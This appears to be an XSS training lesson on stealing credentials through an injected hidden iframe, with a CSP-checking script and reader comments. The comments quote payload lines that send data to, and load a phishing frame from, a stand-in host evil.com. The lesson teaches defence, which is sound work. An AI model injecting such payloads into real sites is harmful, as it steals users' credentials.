Prompt Users for Credentials from a Vulnerable Website via iframe Injection

In this lesson, we'll learn how to exploit an XSS vulnerability to prompt victims for their usernames and passwords on a vulnerable site by loading an iframe from the attacker's website. This demonstrates that even though we've already mitigated JS-based XSS attacks, there are other ways to exploit XSS, and we'll need a more robust CSP header to completely mitigate XSS, which we'll discover in our next lesson!
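
The gap described above, as an added example that is not code from the lesson: a small Node.js checker that resolves which CSP directive governs iframes (`frame-src`, then `child-src`, then `default-src`) and whether it would allow a frame from a given origin. The page URL `https://vulnerable.example/` and the three sample policies are assumptions, and source matching is simplified as noted in the comments.

```javascript
// Added example (not from the lesson): would this CSP let the page frame `frameUrl`?
function parseCsp(header) {
  const policy = new Map();
  for (const part of header.split(';')) {
    const [name, ...sources] = part.trim().split(/\s+/).filter(Boolean);
    // A repeated directive is ignored by browsers: the first occurrence wins.
    if (name && !policy.has(name.toLowerCase())) policy.set(name.toLowerCase(), sources);
  }
  return policy;
}

// Simplified matching: keywords, "*", scheme sources and plain origins only
// (wildcard hosts and path restrictions are not handled).
function sourceMatches(source, target, self) {
  const s = source.toLowerCase();
  if (s.startsWith("'")) return s === "'self'" && target.origin === self.origin;
  if (s === '*') return ['http:', 'https:'].includes(target.protocol);
  if (/^[a-z][a-z0-9+.-]*:$/.test(s)) return target.protocol === s;
  const withScheme = s.includes('://') ? s : `${self.protocol}//${s}`;
  try {
    return new URL(withScheme).origin === target.origin;
  } catch {
    return false;
  }
}

function frameAllowed(header, frameUrl, pageUrl) {
  const policy = parseCsp(header);
  // Frames are governed by frame-src, falling back to child-src, then default-src.
  const directive = ['frame-src', 'child-src', 'default-src'].find((d) => policy.has(d)) || null;
  if (!directive) return { allowed: true, directive }; // nothing restricts framing
  const target = new URL(frameUrl);
  const self = new URL(pageUrl);
  const allowed = policy.get(directive).some((src) => sourceMatches(src, target, self));
  return { allowed, directive };
}

// Constructed inputs: the page URL and all three policies are assumptions.
const PAGE = 'https://vulnerable.example/';
const FRAME = 'https://evil.com:666/steal.html'; // URL quoted in the lesson comments
const POLICIES = {
  scriptOnly: "script-src 'self'",
  frameNone: "script-src 'self'; frame-src 'none'",
  defaultSelf: "default-src 'self'",
};
for (const [label, csp] of Object.entries(POLICIES)) {
  console.log(label, JSON.stringify(frameAllowed(csp, FRAME, PAGE)));
}
```

A policy that only sets `script-src` leaves framing unrestricted, while `frame-src 'none'` or a `default-src 'self'` fallback blocks the cross-origin frame.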

Gheorghe
~ 4 years ago

typo: 'propmt' should be -> 'prompt'

Gheorghe
~ 4 years ago

at payload level: img.src = https://evel.com:666/hijack?payload=${payload} should be img.src = https://evil.com:666/hijack?payload=${payload}

Gheorghe
~ 4 years ago

I guess that 'payload', this time, should be only:

< iframe hidden src="https://evil.com:666/steal.html"></iframe>

Lucas Minter
~ 4 years ago

Thanks for this! I got the transcripts updated!